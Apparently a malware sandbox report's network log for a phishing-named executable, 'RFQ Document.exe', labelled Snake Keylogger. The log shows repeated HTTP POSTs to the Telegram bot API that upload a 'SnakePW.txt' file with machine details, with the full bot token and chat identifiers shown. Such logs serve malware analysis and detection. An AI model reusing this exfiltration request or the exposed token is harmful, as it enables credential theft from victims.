                                            Data Ascii: {"ok":true,"result":{"message_id":12904,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            322192.168.2.450159149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:03 UTC509OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fa9c6a51
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:03 UTC509OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 39 63 36 61 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fa9c6a51Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:03 UTC510INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:03 GMT
                                            Content-Type: application/json
                                            Content-Length: 523
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:03 UTC510INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12905,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            323192.168.2.450160149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:03 UTC511OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fab6a4fe
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:03 UTC511OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 62 36 61 34 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fab6a4feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:04 UTC511INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:04 UTC512INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12906,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            324192.168.2.450161149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:04 UTC512OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fad0deec
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:04 UTC513OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 64 30 64 65 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fad0deecContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:04 UTC513INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:04 UTC513INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12908,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            325192.168.2.450162149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:04 UTC514OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255faefdd62
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:04 UTC514OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 65 66 64 64 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255faefdd62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:04 UTC515INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:04 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12909,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            326192.168.2.450163149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:04 UTC516OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb0a16dc
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:04 UTC516OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 30 61 31 36 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb0a16dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:04 UTC516INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:04 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12910,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            327192.168.2.450164149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:04 UTC517OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb21ed31
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:04 UTC517OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 32 31 65 64 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb21ed31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:04 UTC518INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:04 UTC518INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12911,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            328192.168.2.450165149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:04 UTC519OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb3e8a7b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:04 UTC519OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 33 65 38 61 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fb3e8a7bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:05 UTC519INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:04 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:05 UTC520INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12912,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            329192.168.2.450166149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:05 UTC520OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fb5b2567
                                            Host: api.telegram.org
                                            Content-Length: 407
